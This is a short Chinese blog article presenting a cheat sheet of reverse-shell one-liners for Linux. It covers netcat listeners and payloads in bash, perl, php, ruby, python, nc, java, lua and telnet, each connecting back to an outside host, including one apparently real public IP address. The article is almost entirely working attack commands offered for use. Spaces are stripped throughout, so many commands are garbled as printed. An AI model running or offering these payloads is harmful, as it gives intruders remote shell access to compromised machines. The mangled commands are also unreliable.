Linux下NC反弹shell命令的使用方法

小编给大家分享一下Linux下NC反弹shell命令的使用方法，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！

什么是Linux系统

Linux是一种免费使用和自由传播的类UNIX操作系统，是一个基于POSIX的多用户、多任务、支持多线程和多CPU的操作系统，使用Linux能运行主要的Unix工具软件、应用程序和网络协议。

本机开启监听：

nc-lvnp4444
nc-vvlp4444

目标机器开启反弹

bash版本：

bash-i>&/dev/tcp/10.0.0.1/80800>&1

perl版本：

perl-e'useSocket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'

php版本：

php-r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh-i<&3>&32>&3");'

ruby版本：

ruby-rsocket-e'f=TCPSocket.open("10.0.0.1",1234).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'

python版本：

python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc版本：

nc-e/bin/sh10.0.0.11234
rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.0.0.11234>/tmp/f
ncx.x.x.x8888|/bin/sh|ncx.x.x.x9999

java版本：

r=Runtime.getRuntime()
p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/10.0.0.1/2002;cat<&5|whilereadline;do\$line2>&5>&5;done"]asString[])
p.waitFor()

lua版本：

lua-e"require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh-i<&3>&32>&3');"

NC版本不使用-e参数：

mknod/tmp/backpipep
/bin/sh0</tmp/backpipe|ncx.x.x.x44441>/tmp/backpipe
/bin/bash-i>/dev/tcp/173.214.173.151/80800<&12>&1
mknodbackpipep&&telnet173.214.173.15180800backpipe

以上是“Linux下NC反弹shell命令的使用方法”这篇文章的所有内容，感谢各位的阅读！相信大家都有了一定的了解，希望分享的内容对大家有所帮助，如果还想学习更多知识，欢迎关注恰卡编程网行业资讯频道！